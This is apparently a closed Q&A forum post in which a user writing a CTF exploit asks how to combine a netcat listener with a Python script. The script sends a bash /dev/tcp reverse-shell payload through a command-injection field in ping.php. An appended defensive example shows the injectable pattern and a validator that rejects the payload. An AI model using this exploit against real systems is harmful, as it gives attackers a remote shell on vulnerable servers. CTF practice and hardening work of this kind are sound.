Create netcat listener and execute reverse shell in the same script [closed]

Çağlar Arlı

I'm coding an exploit in Python that exploits a command injection vulnerability for a CTF, and I'm wondering how I could start a netcat listener and then send the payload to the remote host, and once the connection is established, the script execution finishes and drops me to the established connection.

This is my code:

import urllib
import urllib2

url = "http://vuln_url:8080/ping.php"

IP_ADDRESS = 'local_ip'
PORT = '9999'

# Injected after the 'ip' field: ';' ends the ping command, bash then connects back
cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)

values = {
            'ip': cmd,
            'submit': 'submit'
          }

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
urllib2.urlopen(req)

What I want to do is something like this:

import urllib
import urllib2

url = "http://vuln_url:8080/ping.php"

IP_ADDRESS = 'local_ip'
PORT = '9999'

cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)

values = {
            'ip': cmd,
            'submit': 'submit'
          }

# Some code to start the nc listener: os.system("nc -l -p 9999 -vvv")?

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
# Execute the request and start the reverse shell
urllib2.urlopen(req)

# Code to drop me to the established nc connection

I'm not sure if such a thing is even possible. Any idea?
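From the defender's side, the bug the question relies on is a ping handler splicing the user-supplied `ip` field into a shell command string. The following added example (not from the post or the CTF) shows that injectable pattern beside a hardened version that validates the value as an IP address and passes it as a separate argv element, so no shell ever parses it; the payload string is constructed to match the question.

```python
import ipaddress
import subprocess

# Constructed payload, shaped like the one in the question (never executed here).
INJECTED_IP = ";bash -i >& /dev/tcp/10.0.0.1/9999 0>&1"


def vulnerable_shell_command(ip):
    """How a ping.php-style handler becomes injectable: the user value is
    concatenated into one string that a shell will parse, so ';' terminates
    the ping command and whatever follows runs as its own command."""
    return "ping -c 1 " + ip


def validated_ping_argv(ip):
    """Hardened form: accept only a syntactically valid IPv4/IPv6 address and
    return an argv list. Raises ValueError for anything else, including the
    injected payload above (ipaddress rejects it outright)."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % ip)
    return ["ping", "-c", "1", str(addr)]


def is_accepted(ip):
    """True if the hardened validator would let this value reach ping."""
    try:
        validated_ping_argv(ip)
        return True
    except ValueError:
        return False


def run_ping(ip):
    """Execute ping with shell=False so argv elements are never re-parsed."""
    return subprocess.run(validated_ping_argv(ip), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    print(vulnerable_shell_command(INJECTED_IP))   # shows the spliced payload
    print(validated_ping_argv("10.0.0.5"))
    print(is_accepted(INJECTED_IP))                 # False
```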